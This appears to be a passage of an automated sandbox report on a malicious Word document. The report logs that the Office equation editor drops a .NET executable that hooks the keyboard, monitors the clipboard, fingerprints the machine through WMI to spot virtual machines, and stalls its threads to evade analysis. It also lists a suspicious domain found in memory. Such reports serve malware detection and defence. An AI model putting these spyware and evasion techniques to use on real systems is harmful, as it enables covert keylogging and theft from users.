              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350007415.0000000002B13000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350002166.0000000002B0F000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmpString found in binary or memory: https://xWUrFiDn0aBmFXBFM.net

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Installs a global keyboard hookShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3DA6FFF0u002d7A4Cu002d4354u002dA44Au002d80CFFE9AEF36u007d/C8F0ECA3u002d36A1u002d4690u002d8D13u002d6EC07C1D3DE8.csLarge array initialization: .cctor: array initializer size 11944
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 4_2_011E415D
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 5_2_011E415D
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00402296
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00225330
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00226348
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_0022CB50
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00222089
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00225678
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nding Orders Statement -40064778.docJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC34.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Pending Orders Statement -40064778.docVirustotal: Detection: 41%
              Source: Pending Orders Statement -40064778.docReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
              Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindow / User API: threadDelayed 9698
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2508Thread sleep time: -300000s >= -30000s
